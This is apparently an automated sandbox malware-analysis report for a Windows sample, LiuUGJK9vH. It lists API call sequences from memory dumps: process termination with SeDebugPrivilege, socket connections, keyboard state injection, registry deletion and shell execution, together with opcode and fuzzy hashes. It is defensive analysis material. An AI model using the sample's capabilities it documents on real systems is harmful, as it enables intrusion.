                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                      • DestroyIcon.USER32(00000000), ref: 0043C37F
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                      • DestroyIcon.USER32(?), ref: 0043C3AB
                        • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                      • String ID:
                      • API String ID: 2819616528-0
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                      • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                      • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                      • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                      • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                      • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                      • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                      • _wcscat.LIBCMT ref: 00486EAD
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcscat
                      • String ID: SysListView32
                      • API String ID: 307300125-78025650
                      APIs
                        • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                        • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                        • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                      • GetLastError.KERNEL32 ref: 0047E9B7
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                      • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                      • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      • API String ID: 2533919879-2896544425
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2457776203-404129466
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                      • LoadStringW.USER32(00000000), ref: 00464319
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                      • LoadStringW.USER32(00000000), ref: 00464336
                      • _wprintf.LIBCMT ref: 0046435C
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 3648134473-3128320259
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                      • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                      • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                      • String ID:
                      • API String ID: 1211466189-0
                      APIs
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      • API String ID: 1268545403-0
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                      • EnterCriticalSection.KERNEL32(?), ref: 00467130
                      • _memmove.LIBCMT ref: 0046717E
                      • _memmove.LIBCMT ref: 0046719B
                      • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                      • String ID:
                      • API String ID: 256516436-0
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 004861EB
                      • GetDC.USER32(00000000), ref: 004861F3
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                      • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      • API String ID: 3864802216-0
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • _wcstok.LIBCMT ref: 0046EC94
                      • _wcscpy.LIBCMT ref: 0046ED23
                      • _memset.LIBCMT ref: 0046ED56
                      Similarity
                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                      • String ID: X
                      • API String ID: 774024439-3081909835
                      APIs
                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                      • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                      • inet_ntoa.WSOCK32(?), ref: 00476CA7
                        • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                        • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                      • _strlen.LIBCMT ref: 00476D44
                      • _memmove.LIBCMT ref: 00476DAD
                      Similarity
                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                      • String ID:
                      • API String ID: 3619996494-0
                      APIs
                      • IsWindow.USER32(00AC3480), ref: 0048B3EB
                      • IsWindowEnabled.USER32(00AC3480), ref: 0048B3F7
                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                      • SendMessageW.USER32(00AC3480,000000B0,?,?), ref: 0048B512
                      • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                      • GetWindowLongW.USER32(00AC3480,000000EC), ref: 0048B571
                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                      Similarity
                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                      • String ID:
                      • API String ID: 4072528602-0
                      APIs
                      • _memset.LIBCMT ref: 0047F448
                      • _memset.LIBCMT ref: 0047F511
                      • ShellExecuteExW.SHELL32(?), ref: 0047F556
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                      • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                      Similarity
                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                      • String ID: @
                      • API String ID: 3522835683-2766056989
                      APIs
                      • GetParent.USER32(?), ref: 00460F8C
                      • GetKeyboardState.USER32(?), ref: 00460FA1
                      • SetKeyboardState.USER32(?), ref: 00461002
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      APIs
                      • GetParent.USER32(00000000), ref: 00460DA5
                      • GetKeyboardState.USER32(?), ref: 00460DBA
                      • SetKeyboardState.USER32(?), ref: 00460E1B
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      APIs
                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02F98311,?,00000000,?,00000000,00000000), ref: 02F97BDE
                      • __fassign.LIBCMT ref: 02F97C59
                      • __fassign.LIBCMT ref: 02F97C74
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02F97C9A
                      • WriteFile.KERNEL32(?,?,00000000,02F98311,00000000,?,?,?,?,?,?,?,?,?,02F98311,?), ref: 02F97CB9
                      • WriteFile.KERNEL32(?,?,00000001,02F98311,00000000,?,?,?,?,?,?,?,?,?,02F98311,?), ref: 02F97CF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      Similarity
                      • API ID: _wcsncpy$LocalTime
                      • String ID:
                      • API String ID: 2945705084-0
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: ,,I$DllGetClassObject
                      • API String ID: 753597075-1683996018
                      APIs
                      • _memset.LIBCMT ref: 004872AA
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                      • IsMenu.USER32(?), ref: 00487369
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                      • DrawMenuBar.USER32 ref: 004873C4
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert_memset
                      • String ID: 0
                      • API String ID: 3866635326-4108050209
                      • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                      • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                      • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                      • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                      • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                        • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                        • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                        • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                      • String ID:
                      • API String ID: 395352322-0
                      • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                      • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                      • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                      • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                      • GetWindowLongW.USER32(00AC3480,000000F0), ref: 0048631F
                      • GetWindowLongW.USER32(00AC3480,000000F0), ref: 00486354
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                      • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                      • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                      • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                      APIs
                        • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                      • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                      • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                      • WSAGetLastError.WSOCK32 ref: 00476221
                      • closesocket.WSOCK32(00000000), ref: 0047624A
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                      • String ID:
                      • API String ID: 910771015-0
                      • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                      • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                      • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                      • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                      APIs
                        • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                        • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                        • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                      • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                      • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                      • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                      APIs
                        • Part of subcall function 02F931DA: _free.LIBCMT ref: 02F93203
                      • _free.LIBCMT ref: 02F93264
                        • Part of subcall function 02F92096: HeapFree.KERNEL32(00000000,00000000,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?), ref: 02F920AC
                        • Part of subcall function 02F92096: GetLastError.KERNEL32(?,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?,?), ref: 02F920BE
                      • _free.LIBCMT ref: 02F9326F
                      • _free.LIBCMT ref: 02F9327A
                      • _free.LIBCMT ref: 02F932CE
                      • _free.LIBCMT ref: 02F932D9
                      • _free.LIBCMT ref: 02F932E4
                      • _free.LIBCMT ref: 02F932EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                      • Instruction ID: 0d32aaa6b576f40f9e5ee56d83bf84526cf6375dcdc21648d2206062269e265f
                      • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                      • Instruction Fuzzy Hash: ED11DD72E40B04BAFD30FBB0CC45FCB779E6F057C1F404855ABAA66160DA65A5488F51
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                      • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                      • EncodePointer.KERNEL32(00000000), ref: 00424097
                      • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                      • String ID: RoUninitialize$combase.dll
                      • API String ID: 3489934621-2819208100
                      • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                      • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                      • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                      • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,02F9473A,?,?,00000000), ref: 02F94543
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02F9473A,?,?,00000000,?,?,?), ref: 02F945C9
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02F946C3
                      • __freea.LIBCMT ref: 02F946D0
                        • Part of subcall function 02F932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F9332C
                      • __freea.LIBCMT ref: 02F946D9
                      • __freea.LIBCMT ref: 02F946FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: aa1fb9c6de21a3e0290f4ec31900b645d18e4557a9c3a098a4cb61a54d389ef5
                      • Instruction ID: f4cabdb98b7624e7de54a7db0affaa92ffc1103ff4f9c4db02cacdb918cc38b6
                      • Opcode Fuzzy Hash: aa1fb9c6de21a3e0290f4ec31900b645d18e4557a9c3a098a4cb61a54d389ef5
                      • Instruction Fuzzy Hash: 1C51D3B2A00216AFFF258E64CC40EAFB7AAEB54794B154629FE04D7180EB74DC55CE50
                      APIs
                      Memory Dump Source
